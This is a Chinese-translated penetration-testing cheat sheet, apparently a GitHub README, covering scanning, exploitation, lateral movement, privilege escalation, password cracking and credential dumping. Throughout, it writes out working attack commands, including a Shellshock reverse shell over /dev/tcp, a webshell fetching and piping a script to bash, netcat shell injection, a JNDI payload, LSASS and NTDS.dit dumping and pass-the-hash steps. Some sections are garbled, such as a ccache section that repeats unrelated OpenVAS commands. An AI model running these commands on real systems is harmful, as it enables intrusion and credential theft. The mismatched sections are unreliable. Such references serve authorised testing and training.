jwardsmith/Penetration-Testing

GitHub: jwardsmith/Penetration-Testing

一份覆盖渗透测试全流程的命令与工具速查清单,帮助安全团队快速执行信息收集、漏洞利用与横向移动。

Stars: 7 | Forks: 2

# 渗透测试 ## 概述 1. - [被动枚举](#1---passive-enumeration) 2. - [主动枚举](#2---active-enumeration) 3. - [利用](#3---exploitation) 4. - [横向移动](#4---lateral-movement) 5. - [权限提升](#5---privilege-escalation) 6. - [暴力破解](#6---brute-force) 7. - [密码转储](#7---password-dumping) 8. - [文件传输](#8---file-transfers) 9. - [受限 Shell 逃逸](#9---restricted-shell-escapes) 10. - [Shell](#10---shells) 11. - [绕过](#11---evasion) 12. - [在线资源](#12---online-resources) 13. - [浏览器插件](#13---browser-plugins) 14. - [利用工具](#14---exploits) 15. - [利用研究](#15---exploit-research) ## #1. - 被动枚举 - Searchcode ``` https://searchcode.com/ ``` - Shodan ``` https://www.shodan.io/ $ for i in $(cat ip-addresses.txt);do shodan host $i;done ``` - 证书搜索 ``` https://crt.sh/ $ curl -s https://crt.sh/\?q\=\&output\=json | jq . $ curl -s https://crt.sh/\?q\=\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u ``` - Google Dorks ``` intext: inurl:amazonaws.com intext: inurl:blob.core.windows.net ``` - Whois ``` https://domain.glass/ ``` - 云存储桶搜索 ``` https://buckets.grayhatwarfare.com/ ``` ## #2. - 主动枚举 - Nmap ``` $ sudo nmap --script-updatedb $ nmap -sn $ nmap -sC -sV -p- -Pn -A $ nmap -sC -sV -p- -Pn -A -sU $ nmap --top-ports=100 $ nmap --script vuln $ nmap -sV --script banner $ nmap -sV --packet-trace --reason $ nmap -S -e tun0 $ nmap -D RND:5 $ nmap --source-port $ nmap -oA scan $ xsltproc target.xml -o target.html ``` - Nessus ``` $ dpkg -i Nessus-8.15.1-ubuntu910_amd64.deb $ sudo systemctl start nessusd.service https://localhost:8834 https://raw.githubusercontent.com/eelsivart/nessus-report-downloader/master/nessus6-report-downloader.rb ./nessus_downloader.rb ``` - OpenVAS ``` $ sudo apt-get install gvm && openvas $ gvm-setup $ gvm-start https://github.com/TheGroundZero/openvasreporting $ python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx ``` - Netcat ``` $ nc -nv ``` - FTP (端口 21) ``` $ ftp (anonymous:anonymous) ftp> dir ftp> cd ftp> get ftp> put ftp> exit $ openssl s_client -connect :21 -starttls ftp $ wget -m --no-passive ftp://anonymous:anonymous@ ``` - SSH (端口 22) ``` $ ssh @ $ ssh @@ $ ssh @ -p $ chmod 600 id_rsa $ ssh -i id_rsa @ $ ssh @ -o PreferredAuthentications=password $ ssh-audit.py ``` - Telnet (端口 23) ``` $ telnet ``` - SMTP (端口 25) ``` $ telnet 25 VRFY root ``` - DNS (udp/端口 53) ``` $ dig ns @ $ dig mx @ $ dig txt @ $ dig CH TXT version.bind $ dig soa @ $ dig any @ $ dig axfr @ $ for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub. @ | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done $ dnsenum --dnsserver --enum -p 0 -s 0 -o found_subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt $ for i in $(cat subdomainlist.txt);do host $i | grep "has address" | grep | cut -d" " -f4 >> ip-addresses.txt;done ``` - TFTP (udp/端口 69) ``` $ tftp tftp> get tftp> put ``` - HTTP/HTTPS (端口 80/443) ``` Right-Click -> View Page Source https:///robots.txt $ gobuster dir -w -u $ gobuster dir -w -u -x php,html $ gobuster vhost -w -u $ gobuster dns -w -d $ ffuf -u /FUZZ -w $ curl -IL $ curl -H 'User-agent: zerodiumsystem("curl ");' $ curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp//443 0>&1" http:///cgi-bin/user.sh $ feroxbuster -w -u $ wfuzz -c -w -u http://FUZZ. $ nikto -h $ eyewitness -f --web $ whatweb $ curl -v -X OPTIONS $ curl http:// --upload-file test.txt $ curl -X PUT http:///test.txt -d @test.txt $ curl -X PUT http:///test.txt --data-binary @cmdasp.aspx $ curl -X PUT http:///test.txt -d @cmdasp.aspx $ curl -X MOVE -H 'Destination:http:///cmdasp.aspx' http:///test.txt $ davtest -url http:// $ cadaver http:// dav:/ put cmdasp.aspx cmdasp.txt dav:/ put cmdasp.txt cmdasp.aspx ``` - POP3 (端口 110) ``` $ telnet 110 USER admin PASS admin LIST RETR 1 ``` - RPCBIND (端口 111) ``` $ rpcinfo -p ``` - MSRPC (端口 135) ``` $ wmiexec.py :""@ "" ``` - SMB (端口 137/139/445) ``` $ smbclient -N -L $ smbclient -L $ smbclient -L -U $ smbclient \\\\\\c$ $ smbclient \\\\\\c$ -U $ smbclient /// -k -c ls -no-pass $ smbmap -H $ smbmap -H -u -p smb: \> logon "/=`nc -e /bin/sh`" smb: \> !ls $ rpcclient -U "" $ for i in $(seq 500 1100);do rpcclient -N -U "" -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done $ samrdump.py msf> use auxiliary/scanner/smb/smb_version msf> use auxiliary/scanner/smb/smb_login msf> use auxiliary/scanner/smb/smb_ms17_010 msf> use exploit/windows/smb/ms17_010_psexec msf> use exploit/windows/smb/ms17_010_eternalblue msf> use exploit/windows/smb/ms08_067_netapi msf> use exploit/multi/samba/usermap_script msf> use exploit/windows/smb/psexec $ enum4linux -a $ enum4linux-ng.py -A $ crackmapexec smb --shares $ crackmapexec smb --shares -u '' -p '' $ crackmapexec smb --shares -u -p '' $ crackmapexec winrm -u -p '' ``` - IMAP (端口 143) ``` $ telnet 143 1 LOGIN username password 1 LIST "" * 1 FETCH all ``` - SNMP (udp/端口 161) ``` $ snmpwalk -v 2c -c $ snmpwalk -v 2c -c public 1.3.6.1.2.1.1.5.0 $ snmpwalk -v 2c -c private 1.3.6.1.2.1.1.5.0 $ onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt $ braa @:.1.* ``` - R-Services (端口 512/513/514) ``` $ rlogin -l $ rwho $ rusers -al ``` - IPMI (udp/端口 623) ``` msf> use auxiliary(scanner/ipmi/ipmi_version) msf> use auxiliary(scanner/ipmi/ipmi_dumphashes) ``` - CUPS (端口 631) ``` $ cupsctl ErrorLog="/etc/shadow" $ curl http://:631/admin/log/error_log? use multi/escalate/cups_root_file_read ``` - Rsync (端口 873) ``` $ rsync -av --list-only rsync:// $ rsync -av --list-only rsync:/// $ rsync rsync://// $ rsync -av rsync:// ``` - IMAPS (端口 993) ``` $ curl -k 'imaps://' --user : $ openssl s_client -connect :imaps ``` - POP3S (端口 995) ``` $ openssl s_client -connect :pop3s ``` - MSSQL (端口 1433) ``` $ python3 mssqlclient.py /@ -windows-auth SQL> SELECT name from sys.databases SQL> SELECT is_srvrolemember('sysadmin'); SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; SQL> EXEC xp_cmdshell "whoami"; ``` - Oracle TNS (端口 1521) ``` $ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip $ wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip $ sudo mkdir -p /opt/oracle $ sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip $ sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip $ export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH $ export PATH=$LD_LIBRARY_PATH:$PATH $ source ~/.bashrc $ cd ~ $ git clone https://github.com/quentinhardy/odat.git $ cd odat/ $ pip install python-libnmap $ git submodule init $ git submodule update $ pip3 install cx_Oracle $ sudo apt-get install python3-scapy -y $ sudo pip3 install colorlog termcolor passlib python-libnmap $ sudo apt-get install build-essential libgmp-dev -y $ pip3 install pycryptodome $ ./odat.py -h $ ./odat.py all -s $ ./odat.py utlfile -s -d -U -P --sysdba --putFile $ sqlplus /@/ $ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig $ sqlplus /@/ as sysdba SQL> SELECT table_name from all_tables; SQL> SELECT * from user_role_privs; SQL> select name, password from sys.user$; ``` - NFS (端口 2049) ``` $ showmount -e $ sudo mount -t nfs : -o nolock $ sudo umount $ sudo useradd -u ``` - MySQL (端口 3306) ``` $ mysql -h -u root MySQL [(none)]> SELECT version(); MySQL [(none)]> SHOW databases; MySQL [(none)]> USE ; MySQL [(none)]> SHOW tables; MySQL [(none)]> SELECT * FROM ; MySQL [(none)]> SELECT * from
where = ""; ``` - RDP (端口 3389) ``` $ xfreerdp /v: $ xfreerdp /v: /u:Administrator $ xfreerdp /v: /u:Administrator /d: $ freerdp /v: /cert:ignore /u:Administrator /p:'' $ rdp-sec-check.pl ``` - PostgreSQL (端口 5432) ``` $ psql -h -U -p =# \l =# \c secrets =# \dt =# SELECT * FROM
; ``` - WinRM (端口 5985) ``` $ evil-winrm -i -u -p $ evil-winrm -i -u -H ``` - X11 (端口 6000) ``` $ cat .Xauthority | base64 $ echo AQAADHN<...SNIP...>S0xAoNm/oZZ4/ | base64 -d > /tmp/.Xauthority $ export XAUTHORITY=/tmp/.Xauthority $ w $ xwd -root -screen -silent -display :0 > /tmp/screen.xwd $ convert screen.xwd screen.png ``` - Redis (端口 6379) ``` $ redis-cli -h :6379> select :6379> keys * :6379> get ``` - MongoDB (端口 27017/27117) ``` $ ./mongo mongodb://:27017 > show dbs; > use ; > show collections; > db..find().pretty(); $ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);" $ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("")},{$set:{"x_shadow":""}})' ``` ## #3. - 利用 - Searchsploit ``` $ searchsploit ``` - Metasploit ``` $ sudo msfdb init $ msfconsole msf6 > loadpath /usr/share/metasploit-framework/modules/ msf6 > reload_all msf6 > show exploits msf6 > show payloads msf6 > search exploit eternalblue msf6 > use exploit/windows/smb/ms17_010_psexec msf6 exploit(windows/smb/ms17_010_psexec) > info msf6 exploit(windows/smb/ms17_010_psexec) > options msf6 exploit(windows/smb/ms17_010_psexec) > advanced msf6 exploit(windows/smb/ms17_010_psexec) > show targets msf6 exploit(windows/smb/ms17_010_psexec) > show encoders msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0 msf6 exploit(windows/smb/ms17_010_psexec) > check msf6 exploit(windows/smb/ms17_010_psexec) > set autorunscript migrate -f msf6 exploit(windows/smb/ms17_010_psexec) > exploit msf6 exploit(windows/smb/ms17_010_psexec) > exploit -e shikata_ga_nai msf6 > sessions msf6 > sessions -i 1 msf6 > jobs msf6 > jobs kill 1 msf6 > route print msf6 > route add 192.168.1.0/24 11 msf6 > use multi/manage/autoroute ``` - Meterpreter ``` meterpreter > sysinfo meterpreter > getuid meterpreter > background meterpreter > search -f *pass*.txt meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\Users\\Public meterpreter > download c:\\Windows\\system32\\calc.exe /tmp/calc.exe meterpreter > shell meterpreter > getprivs meterpreter > use priv meterpreter > hashdump meterpreter > lsa_dump_sam meterpreter > lsa_dump_secrets meterpreter > use incognito meterpreter > list_tokens -u meterpreter > list_tokens -g meterpreter > impersonate_token \ meterpreter > steal_token meterpreter > drop_token meterpreter > execute -f -i meterpreter > execute -f -i -H -t meterpreter > rev2self meterpreter > getsystem meterpreter > ps meterpreter > migrate meterpreter > load kiwi meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.110 ``` - 本地文件包含 (LFI) ``` http:///?page=../../../../../../../../windows/system32/drivers/etc/hosts ``` - 远程文件包含 (RFI) ``` sudo responder -I http:///?page=///somefile ``` - 服务器端模板注入 (SSTI) ``` ${7*7} ``` - 不安全的直接对象引用 (IDOR) ``` http:///data/0 http:///data/1 http:///data/2 ``` - Webshell ``` http:///shell.php?cmd=id http:///shell.php?cmd=curl%20:8000/shell.sh|bash ``` - Sqlmap ``` $ sqlmap -u '' --cookie="PHPSESSID=" $ sqlmap -u '' --cookie="PHPSESSID=" --os-shell ``` - Rogue-JNDI ``` $ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,} | {base64,-d}|{bash,-i}" --hostname "" ``` - Tomcat ``` http://:/manager/html tomcat:s3cret use exploit/multi/http/tomcat_mgr_upload ``` - PRTG 网络监控 ``` C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.dat https://github.com/shk0x/PRTG-Network-Monitor-RCE/blob/master/prtg-exploit.sh use exploit/windows/http/prtg_authenticated_rce ``` ## #4. - 横向移动 - 本地端口转发 ``` $ ssh -L 1234:localhost:5432 @ ``` - 动态端口转发 ``` $ ssh -D 1234 @ ``` - Proxychains ``` Edit /etc/proxychains4.conf Edit [ProxyList] e.g. 127.0.0.1 9050 $ proxychains # 使用 ProxyChains 运行 Nmap 时需要 -sT 选项 $ sudo proxychains -q nmap -sT -Pn 172.16.119.13 --open ``` - Proxychains with Kerberos ``` Edit /etc/proxychains4.conf Edit [ProxyList] e.g. 127.0.0.1 9050 # 要使用 Kerberos 票据,我们需要指定目标计算机名称(而非 IP 地址)并使用 -k 选项。如果提示输入密码,我们也可以包含 -no-pass 选项 $ proxychains -k ``` - Chisel ``` https://github.com/jpillora/chisel $ sudo ./chisel server -p 8000 --reverse $ ./chisel client :8000 R:631:127.0.0.1:631 ``` - Socat ``` $ socat tcp-listen:9090,fork tcp:127.0.0.1:631 & ``` - Meterpreter ``` meterpreter> portfwd add -l 8082 -p 631 -r 127.0.0.1 ``` - PsExec ``` $ python psexec.py :@ $ python psexec.py @ ``` - Runas ``` C:\> runas /savecred /user: cmd ``` - PowerShell 远程执行 ``` PS C:\> Enter-PSSession -ComputerName ``` - Evil-WinRM ``` $ evil-winrm -i -u -p $ evil-winrm -i -u -H ``` - Evil-WinRM with Kerberos ``` # 安装过程中会提示输入 Kerberos 领域名称。请使用域名和 KDC $ sudo apt-get install krb5-user -y OR # 如果已安装,请编辑此文件 $ cat /etc/krb5.conf $ proxychains evil-winrm -i -r ``` - Mimikatz Pass-The-Hash (PTH) ``` C:\> mimikatz.exe privilege::debug "sekurlsa::pth /user: /rc4: /domain: /run:cmd.exe" exit ``` - Invoke-TheHash (PTH) ``` PS C:\> Import-Module .\Invoke-TheHash.psd1 PS C:\> Invoke-SMBExec -Target -Domain -Username -Hash -Command "" -Verbose PS C:\> Invoke-WMIExec -Target -Domain -Username -Hash -Command "" -Verbose ``` - Impacket (PTH) ``` $ impacket-psexec @ -hashes : $ impacket-wmiexec @ -hashes : $ impacket-atexec @ -hashes : $ impacket-smbexec @ -hashes : ``` - Netexec (PTH) ``` $ netexec smb -u -d . -H $ netexec smb -u -d . -H -x whoami ``` - Evil-winrm (PTH) ``` $ evil-winrm -i -u -H $ evil-winrm -i -u -H ``` - Xfreerdp (PTH) ``` # 在目标系统上禁用受限管理员模式 C:\> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f $ xfreerdp /v: /u: /pth: ``` - 列出票据 ``` C:\> klist C>\> Rubeus.exe klist mimikatz # kerberos::list ``` - Mimikatz 导出票据 ``` C:\> mimikatz.exe privilege::debug "sekurlsa::tickets /export" C:\> dir *.kirb ``` - Rubeus 导出票据 ``` C:\> Rubeus.exe dump /nowrap ``` - Mimikatz Pass-The-Ticket (PTT) ``` mimikatz # kerberos::ptt "" ``` - Rubeus Pass-The-Ticket (PTT) ``` C:\> Rubeus.exe ptt /ticket: C:\> Rubeus.exe ptt /ticket: ``` - 将 .kirbi 转换为 Base64 格式 ``` PS C:\> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\")) ``` - Mimikatz OverPass-The-Hash (OPTH) ``` # Mimikatz 执行 Pass the Key/OverPass the Hash 攻击需要管理员权限,而 Rubeus 不需要 mimikatz # sekurlsa::pth /domain: /user: /ntlm: ``` - Rubeus OverPass-The-Hash (OPTH) ``` # Mimikatz 执行 Pass the Key/OverPass the Hash 攻击需要管理员权限,而 Rubeus 不需要 C:\> Rubeus.exe asktgt /domain: /user: /aes256: /nowrap ``` - Rubeus OverPass-The-Hash (OPTH) -> Rubeus Pass-The-Ticket (PTT) ``` C:\> Rubeus.exe asktgt /domain: /user: /rc4: /ptt C:\> Rubeus.exe asktgt /domain: /user: /aes256: /ptt ``` - Rubeus 牺牲进程 ``` C:\> Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show ``` - 检查 Linux 是否加入域 ``` $ realm list $ ps -ef | grep -i "winbind\|sssd" ``` - 查找 Linux KeyTab 文件 ``` # 要使用 keytab 文件,我们必须在文件上拥有读写(rw)权限 $ find / -name *keytab* -ls 2>/dev/null ``` - 查找 Linux KeyTab 文件中的计划任务 ``` $ crontab -l ``` - 列出 Linux KeyTab 文件信息 ``` $ klist -k -t /opt/specialfiles/carlos.keytab ``` - 使用 Linux KeyTab 文件模拟用户 ``` # kinit 对大小写敏感,因此请确保使用与 klist 中显示的主体名称一致。在这种情况下,用户名为小写,域名为大写 # 为保持当前会话的票据,在导入 keytab 之前,请保存 ccache 文件的副本,该文件存在于环境变量 KRB5CCNAME 中 $ kinit carlos@ -k -t /opt/specialfiles/carlos.keytab ``` - 提取 Linux KeyTab 哈希 ``` https://github.com/sosdave/KeyTabExtract $ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab ``` - 查找 Linux Ccache 文件 ``` $ sudo apt-get install gvm && openvas $ gvm-setup $ gvm-start https://github.com/TheGroundZero/openvasreporting $ python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx ``` - 使用 Linux Ccache 文件模拟用户 ``` # cp /tmp/krb5cc_647401106_I8I133 . # export KRB5CCNAME=/root/krb5cc_647401106_I8I133 # klist ``` - 将 Linux Ccache 文件转换为 Windows .kirbi 文件 ``` https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py $ impacket-ticketConverter krb5cc_647401106_I8I133 ``` - 将 Windows .kirbi 文件转换为 Linux Ccache 文件 ``` https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py $ impacket-ticketConverter krb5cc_647401106_I8I133 ``` - Linkatz ``` https://github.com/CiscoCXSecurity/linikatz $ ./linikatz.sh ``` - AD CS NTLM 中继攻击 (ESC8) ``` $ impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication ``` - 打印机漏洞利用 ``` https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py $ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12 ``` - Pass-The-Certificate (PTC) ``` https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py $ python3 -m venv .venv $ source .venv/bin/activate $ pip3 install -r requirements.txt # 如果遇到提示“Error detecting the version of libcrypto”的错误,可以通过安装 oscrypto 库来解决 $ pip3 install -I git+https://github.com/wbond/oscrypto.git $ python3 gettgtpkinit.py -cert-pfx ../krbrelayx/DC01\$.pfx -dc-ip 10.129.234.109 'inlanefreight.local/dc01$' /tmp/dc.ccache ``` - 影子凭证 (msDS-KeyCredentialLink) ``` https://github.com/ShutdownRepo/pywhisker $ pywhisker --dc-ip 10.129.234.109 -d INLANEFREIGHT.LOCAL -u wwhite -p 'package5shores_topher1' --target jpinkman --action add $ python3 gettgtpkinit.py -cert-pfx ../eFUVVTPf.pfx -pfx-pass 'bmRH4LK7UwPrAOfvIx6W' -dc-ip 10.129.234.109 INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache ``` ## #5. - 权限提升 - Sudo ``` $ sudo -l $ sudo -u /bin/bash ``` - SUID ``` https://github.com/Anon-Exploiter/SUID3NUM ``` - WinPEAS ``` https://github.com/carlospolop/PEASS-ng ``` - LinPEAS ``` https://github.com/carlospolop/PEASS-ng ``` - LinEnum ``` https://github.com/rebootuser/LinEnum ``` - Linuxprivchecker ``` https://github.com/sleventyeleven/linuxprivchecker ``` - Capabilities ``` $ getcap -r / 2>/dev/null CAP_SETUID ``` - Python ``` >>> import os >>> os.setuid(0) >>> os.system("/bin/bash") $ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' ``` - Seatbelt ``` https://github.com/GhostPack/Seatbelt ``` - JAWS ``` https://github.com/411Hall/JAWS ``` - 弱服务 ``` C:\> sc.exe config binPath=C:\Windows\Temp\nc.exe -e cmd.exe " C:\> sc.exe stop C:\> sc.exe start ``` - 计划任务 ``` $ ls /etc/crontab $ ls /etc/cron.d $ ls /var/spool/cron/crontabs/root ``` - 易受攻击的软件 ``` $ dpkg -l C:\> dir "C:\Program Files" C:\> dir "C:\Program Files (x86)" ``` - 泄露的凭据 ``` $ cat .bash_history PS C:\> Get-Content (Get-PSReadlineOption).HistorySavePath ``` - SSH 密钥登录 ``` $ cat /home/user/.ssh/id_rsa $ cat /root/.ssh/id_rsa $ chmod 600 id_rsa $ ssh @ -i id_rsa ``` - SSH 授权密钥 ``` $ ssh-keygen -f key $ cat key.pub $ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys $ ssh @ -i key ``` - Whoami ``` C:\> whoami /priv ``` - Windows Exploit Suggester ``` https://github.com/AonCyberLabs/Windows-Exploit-Suggester (On Kali) $ ./windows-exploit-suggester.py --update $ install python-xlrd $ pip install xlrd --upgrade feed it "systeminfo" input, and point it to the microsoft database $ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt ``` - Metasploit ``` msf> use post/multi/recon/local_exploit_suggester ``` ## #6. - 暴力破解 - Cewl ``` $ cewl https://www.example.com -d 4 -m 6 --lowercase -w example.wordlist ``` - Username-Anarchy ``` https://github.com/urbanadventurer/username-anarchy $ ./username-anarchy -i listoffirstandlastnames.txt ``` - Kerbrute 用户名枚举 ``` $ ./kerbrute_linux_amd64 userenum --dc --domain names.txt ``` - Netexec ``` $ netexec ssh -u usernames.txt -p passwords.txt $ netexec winrm -u usernames.txt -p passwords.txt $ netexec smb -u -p --shares $ netexec smb --local-auth -u -p --sam $ netexec smb --local-auth -u -p --lsa $ netexec smb -u -p --ntds $ netexec smb -u -p -M ntdsutil $ nxc smb -u -p --spider IT --content --pattern "passw" ``` - PCredz ``` $ ./Pcredz -f demo.pcapng -t -v ``` - HashID ``` $ hashid $ hashid -j $ hashid -m ``` - 示例哈希值 ``` https://openwall.info/wiki/john/sample-hashes https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats https://hashcat.net/wiki/doku.php?id=example_hashes ``` - Md5sum ``` $ echo -n | md5sum ``` - Sha1sum ``` $ echo -n | sha1sum ``` - Sha256sum ``` $ echo -n | sha256sum ``` - CrackStation ``` https://crackstation.net/ ``` - John The Ripper ``` $ unshadow passwd.txt shadow.txt > unshadowed.txt $ john -w=/usr/share/wordlists/rockyou.txt hash.txt $ john --format -w=/usr/share/wordlists/rockyou.txt hash.txt $ john --single hash.txt $ john --incremental hash.txt $ john --show hash.txt ``` - Hydra ``` # 如果出现错误,请升级 hydra $ hydra -l '' -p '' ssh $ hydra -L -P ssh:// $ hydra -L -P rdp:// $ hydra -L -P smb:// $ hydra -C ssh:// ``` - 文件信息格式 ``` $ file https://fileinfo.com/filetypes/encoded https://fileinfo.com/filetypes/compressed $ curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt ``` - Zip2john ``` $ zip2john ZIP.zip > zip.hash $ john --wordlist= zip.hash $ john --show zip.hash ``` - Ssh2john ``` $ python3 ssh2john.py > ssh.hash $ john --wordlist= ssh.hash $ john --show ssh.hash ``` - Office2john ``` $ office2john.py Protected.docx > protected-docx.hash $ john --wordlist= protected-docx.hash $ john --show protected-docx.hash ``` - Pdf2john ``` $ pdf2john.pl PDF.pdf > pdf.hash $ john --wordlist= pdf.hash $ john --show pdf.hash ``` - Bitlocker2john ``` $ bitlocker2john -i Backup.vhd > backup.hashes $ grep "bitlocker\$0" backup.hashes > backup.hash $ hashcat -a 0 -m 22100 '' # 如何在 Linux 上挂载 $ sudo apt-get install dislocker $ sudo mkdir -p /media/bitlocker $ sudo mkdir -p /media/bitlockermount $ sudo losetup -f -P Backup.vhd $ sudo dislocker /dev/loop0p2 -u1234qwer -- /media/bitlocker $ sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount $ cd /media/bitlockermount/ $ ls -la $ sudo umount /media/bitlockermount $ sudo umount /media/bitlocker ``` - Hashcat ``` $ hashcat --force password.list -r custom.rule --stdout > mut_password.list $ hashcat -a 0 -m 0 hashes.txt $ hashcat -a 0 -m 0 $ hashcat -a 0 -m 0 -r /usr/share/hashcat/rules/best64.rule $ hashcat -a 3 -m 0 '?u?l?l?l?l?d?s' $ hashcat -m 1000 ntlm-hashes.txt $ hashcat -m 1000 --show $ hashcat -m 1800 -a 0 unshadowed.txt -o /tmp/unshadowed.cracked $ hashcat -m 500 -a 0 md5-hashes.txt $ hashcat -m 2100 -a 0 $ hashcat -m 22100 bitlocker-hashes.txt -o backup.cracked ``` - 压缩包破解 ``` $ file GZIP.gzip $ for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done ``` - 默认凭据 ``` https://github.com/ihebski/DefaultCreds-cheat-sheet $ pip3 install defaultcreds-cheat-sheet $ creds search linksys https://www.softwaretestinghelp.com/default-router-username-and-password-list/ ``` ## #7. - 密码转储 - Windows 查找位置 ``` Passwords in Group Policy in the SYSVOL share Passwords in scripts in the SYSVOL share Password in scripts on IT shares Passwords in web.config files on dev machines and IT shares Password in unattend.xml Passwords in the AD user or computer description fields KeePass databases (if we are able to guess or crack the master password) Found on user systems and shares Files with names like pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, and Sharepoint Keywords within files such as passw, user, token, key, and secret Files with extensions commonly associated with stored credentials, such as .ini, .cfg, .env, .xlsx, .ps1, and .bat Files with "interesting" names that include terms like config, user, passw, cred, or initial Search for files containing the string \ ``` - Linux 查找位置 ``` Configuration files Databases Notes Scripts Cronjobs SSH keys History Files Application logs Event logs Service logs System logs /var/log/messages Generic system activity logs. /var/log/syslog Generic system activity logs. /var/log/auth.log (Debian) All authentication related logs. /var/log/secure (RedHat/CentOS) All authentication related logs. /var/log/boot.log Booting information. /var/log/dmesg Hardware and drivers related information and logs. /var/log/kern.log Kernel related warnings, errors and logs. /var/log/faillog Failed login attempts. /var/log/cron Information related to cron jobs. /var/log/mail.log All mail server related logs. /var/log/httpd All Apache related logs. /var/log/mysqld.log All MySQL server related logs. Memory and cache Keyrings e.g. browser stored credentials ``` - Findstr ``` C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml ``` - Get-ChildItem ``` PS C:\> Get-ChildItem -Recurse -Include *.ext \\Server\Share | Select-String -Pattern "pass" ``` - Rundll32 ``` PS C:\> Get-Process lsass PS C:\> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full ``` - Reg ``` ## 如果只想转储本地用户的哈希值 C:\> reg.exe save hklm\sam C:\sam.save C:\> reg.exe save hklm\system C:\system.save # 如果我们希望缓存域用户凭据以及用于 DPAPI 的机器和用户密钥 C:\> reg.exe save hklm\security C:\security.save ``` - Vssadmin ``` C:\> vssadmin CREATE SHADOW /For=C: ``` - NTDS.dit ``` C:\> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit ``` - Windows 凭据管理器 ``` C:\> rundll32 keymgr.dll,KRShowKeyMgr C:\> cmdkey /list ``` - Snaffler ``` https://github.com/SnaffCon/Snaffler C:\> snaffler.exe -s ``` - PowerHuntShares ``` https://github.com/NetSPI/PowerHuntShares PS C:\> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public ``` - MANSPIDER ``` https://github.com/blacklanternsecurity/MANSPIDER $ docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider -c '' -p '!' ``` - Pypykatz ``` $ pypykatz lsa minidump lsass.dmp ``` - Secretsdump ``` $ python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL $ impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL $ impacket-secretsdump -k -no-pass -dc-ip -just-dc-user 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL ``` - For 循环 ``` $ for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done $ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done $ for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done $ find /home/* -type f -name "*.txt" -o ! -name "*.*" $ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share";done $ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 